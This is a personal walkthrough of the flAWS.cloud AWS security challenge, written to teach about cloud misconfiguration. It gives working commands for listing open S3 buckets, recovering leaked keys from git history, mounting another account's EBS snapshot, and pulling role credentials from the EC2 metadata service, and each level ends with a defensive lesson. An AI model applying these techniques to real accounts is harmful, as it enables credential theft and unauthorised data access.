flAWS.cloud Cloud Security Misconfigurations Challenge
Table of Contents
My YouTube Walk-through #
What’s the point of this? #
I believe the flAWS challenge was created to bring attention to common misconfigurations in AWS environments. Much of the early challenge deals with S3 misconfigurations. Check out https://github.com/nagwww/s3-leaks, which lists S3 bucket leaks from 2013 to 2022. These vulnerabilities leave product and user data easily accessible to attackers and to anyone who would like to use that data in their own exploits. Learning how these misconfigurations happen, and raising awareness of the issue, will hopefully prevent some of them, because these leaks can be very damaging to companies and their users.
Useful Stuff for this challenge #
- AWS CLI Docs
- Sign up for AWS Free tier: https://aws.amazon.com/free/
Level 1: Everyone has access #
The level just reads:
This level is buckets of fun. See if you can find the first sub-domain.
This is probably referring to S3 buckets, since S3 is AWS's object storage service. It's also the service a lot of companies have gotten into trouble for misconfiguring and leaving open to the internet.
All S3 buckets, when configured for web hosting, are given an AWS domain you can use to browse to it without setting up your own DNS. In this case, flaws.cloud can also be visited by going to http://flaws.cloud.s3-website-us-west-2.amazonaws.com/
Use nslookup, host, and/or dig to get more information on the domain #
```shell
nslookup flaws.cloud
host flaws.cloud
dig 126.96.36.199
host 188.8.131.52
```
List the contents of the bucket using aws cli #
```shell
aws s3 ls s3://flaws.cloud/ --region us-west-2
# run the command with no sign request
aws s3 ls s3://flaws.cloud/ --region us-west-2 --no-sign-request
```
- the `--no-sign-request` flag tells the CLI to send the request unsigned, without looking for credentials
We could also have easily gone to flaws.cloud.s3.amazonaws.com, since we know this site is hosted on S3, read the XML listing, and found the secret file for level 2 there.
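The XML listing mentioned above is an S3 `ListBucketResult` document, and the object names sit inside `<Key>` tags. A minimal sketch of pulling keys out of such a response (the sample XML and file names here are made up, not the live bucket contents):

```shell
# A trimmed ListBucket-style response (hypothetical file names, not live output):
xml='<ListBucketResult><Contents><Key>index.html</Key></Contents><Contents><Key>secret-abc123.html</Key></Contents></ListBucketResult>'

# Pull the object keys out of the XML:
keys=$(printf '%s\n' "$xml" | grep -o '<Key>[^<]*</Key>' | sed 's/<[^>]*>//g')
printf '%s\n' "$keys"
```

Against the real bucket you'd feed `curl -s http://flaws.cloud.s3.amazonaws.com/` into the same pipeline instead of the sample string.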
The Problem #
This level granted everyone list permissions. Don't open permissions to everyone; by default, S3 buckets are private.
Level 2: Any authenticated AWS user has access #
The challenge lets us know this level is going to be similar, but we'll need our own AWS creds.
Create an IAM user on AWS #
- I created a user called demonstrata to demonstrate 😅
Configure profile on the CLI #
```shell
# input the access key ID and secret access key when prompted
# probably safe choosing any region
aws configure --profile demonstrata
```
List the contents of the bucket using aws CLI with --profile #

```shell
# aws credentialed access
aws s3 --profile demonstrata ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
```
The Problem #
Don't open permissions to "Any Authenticated AWS User": that grouping includes every AWS account in existence, not just users in your own account.
Level 3: Keys get leaked in Git History #
The level says that it's fairly similar to the last one, but we'll be able to find some keys this time. How can we list what other buckets exist? Hmmm.
Find a git repository #
- https://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com/ bucket contains a git config file
- use the sync command to duplicate this bucket locally into a directory on my machine I called "flaws"
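The sync step sketched out (the bucket allows anonymous reads, hence `--no-sign-request`; the guard around the CLI is mine so the snippet degrades gracefully without network access):

```shell
# Pull the whole bucket down into a local "flaws" directory:
mkdir -p flaws
if command -v aws >/dev/null 2>&1; then
  aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ ./flaws --no-sign-request || echo "sync failed (no network?)"
else
  echo "aws CLI not installed"
fi
```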
Use git log to pull old commit history #
- use git log in the synced directory to pull the git commit history
- git checkout the first commit
- find access keys accidentally added to initial commit
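The git steps above can be demonstrated with a throwaway local repo; everything below (repo, file name, key value) is a made-up example, not the actual flaws bucket contents:

```shell
# Throwaway repo showing why deleting a secret in a later commit
# doesn't remove it from history:
tmp=$(mktemp -d)
cd "$tmp"
git init -q repo
cd repo
git config user.email "demo@example.com"
git config user.name "demo"

echo "AWS_ACCESS_KEY_ID=AKIAFAKEFAKEFAKEFAKE" > access_keys.txt
git add access_keys.txt
git commit -qm "first commit"

git rm -q access_keys.txt
git commit -qm "remove keys"

# The 'removed' secret is still one checkout away:
first_commit=$(git rev-list --max-parents=0 HEAD)
git checkout -q "$first_commit"
cat access_keys.txt
```

This is exactly the pattern in the flaws repo: the keys were "deleted" in a later commit, but `git log` plus `git checkout` brings them right back.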
Configure a new AWS CLI profile with creds and see what buckets it can access #
We find the URL to the next level: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/
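The configuration step can be sketched as follows; the profile name `level3` matches the one used in the later levels, and the key values are placeholders for the ones recovered from the repo's first commit:

```shell
profile=level3
if command -v aws >/dev/null 2>&1; then
  # placeholder values: substitute the keys found in the first commit
  aws configure set aws_access_key_id     "<leaked-access-key-id>"     --profile "$profile"
  aws configure set aws_secret_access_key "<leaked-secret-access-key>" --profile "$profile"
  # see every bucket these keys can list
  aws s3 ls --profile "$profile" || echo "listing fails until real keys are set"
else
  echo "aws CLI not installed"
fi
```

The `aws s3 ls` with no bucket argument is the key move here: it lists every bucket in the account the keys belong to, which is how the level4 bucket turns up.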
The Problem #
I've personally found access keys on GitHub before; it's not an uncommon thing. Yes, devs should be more careful with their commits, but the bigger problem is that the secrets weren't rotated. Access keys and passwords of any sort should be changed on a regular interval, and when an incident happens, like keys leaking into a publicly accessible space, those keys should be revoked immediately.
Level 4: Accessing EC2 Instance Snapshots #
Our goal here is to get access to the EC2 instance running this level's site.
When we go to the website, it asks for credentials we don't have.
Identify the account ID of the creds we found in the previous level #
```shell
aws --profile level3 sts get-caller-identity
```

```shell
# see all the snapshots associated with this user
aws --profile level3 ec2 describe-snapshots --owner-id 975426262029

# we can even see more if we run the same command without the owner id
aws --profile level3 ec2 describe-snapshots
```
Create a Volume for the snapshot #
```shell
aws --profile demonstrata ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
```
Create ec2 instance from Snapshot #
- simply create an ec2 instance using the snapshot as a volume
- important things to configure here are attaching the volume as /dev/sde and enabling the delete-on-termination option
Configure Pem File #
- download the SSH key and put it in your working folder
- change the permissions

```shell
chmod 400 flaws.pem
```

- SSH into the instance

```shell
ssh -i flaws.pem ubuntu@<your-instance-public-ip>
```
Mount the Volume #
- list information about all available block devices with `lsblk`
- mount the volume you added (it should be the 8 GB one)

```shell
sudo mount /dev/xvde1 /mnt
```
Find keys in the Instance #
- navigate to /mnt/home/ubuntu and find the .sh file
- use the creds to log in
The Problem #
People sometimes use snapshots to regain access to their own EC2 instances when they forget the passwords. The same trick lets attackers in.
Level 5: The Magic IP 169.254.169.254 & Metadata Service #
The level asks us to use the proxy to figure out how to list the contents of level6 bucket level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.
Access the Metadata service for flaws.cloud #
Might be useful to reference: https://www.rfc-editor.org/rfc/rfc3927
We can use the magic IP 169.254.169.254 to query the metadata service for the EC2 instance
- We find some creds in the metadata
- Use new creds to find the secret directory at http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
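As a sketch of what lives behind that IP, here's what querying the instance metadata service looks like from inside an EC2 instance; in the challenge, the same paths are appended to the level's proxy URL instead. The timeout guard is mine, since 169.254.169.254 only answers on EC2:

```shell
# Base of the instance metadata service (link-local, per RFC 3927):
imds="http://169.254.169.254/latest/meta-data"

# Only answers from inside an EC2 instance, so time out quickly elsewhere:
role=$(curl -s --max-time 2 "$imds/iam/security-credentials/" || true)
if [ -n "$role" ]; then
  # Temporary AccessKeyId / SecretAccessKey / Token for the instance's IAM role:
  curl -s "$imds/iam/security-credentials/$role"
else
  echo "metadata service unreachable (not on EC2)"
fi
```

One gotcha when reusing these creds in a CLI profile: they are temporary role credentials, so `aws_session_token` has to be set alongside the key ID and secret.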
The Problem #
Applications should not allow access to 169.254.169.254 or any local and private IP ranges. IAM roles should be restricted as much as possible.
Level 6: Read-Only? Permission Trouble #
In this level we actually get some keys, with the SecurityAudit policy attached to them. But they might be able to do other "things".
Configure another profile with the keys and figure out what they can do #
```shell
aws configure --profile level6
```
- figure out what this profile has
```shell
aws --profile level6 iam get-user
```
- list policies attached to user
```shell
aws --profile level6 iam list-attached-user-policies --user-name Level6
```
- view the policies
```shell
aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit --version-id v1

aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
```
Lambda Functions #
- list the Lambda functions these keys can see

```shell
aws --region us-west-2 --profile level6 lambda list-functions
```
- get the policy for the Lambda

```shell
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
```
- the policy reveals permission to invoke the function through an API Gateway with REST API ID s33ppypa75

```shell
aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
```
- the stage name is “Prod”
- we put all the information we gathered together into the URL https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
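The pieces assemble into the invoke URL in a predictable shape, `https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>`; a quick sketch (the curl is guarded since network access may be unavailable):

```shell
# Assemble the invoke URL from the pieces gathered above:
api_id="s33ppypa75"; region="us-west-2"; stage="Prod"; resource="level6"
url="https://${api_id}.execute-api.${region}.amazonaws.com/${stage}/${resource}"
echo "$url"

# Hit the endpoint:
curl -s --max-time 5 "$url" || echo "endpoint unreachable"
```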
The Problem #
We shouldn't hand out any permissions liberally, even permissions that only let users read metadata or see what their own permissions are. Information is power. We should remember that when configuring things.
The End #
Final Thoughts #
I’m still thinking about it to be honest…😂.
I think I would like to learn more about understanding lambda functions.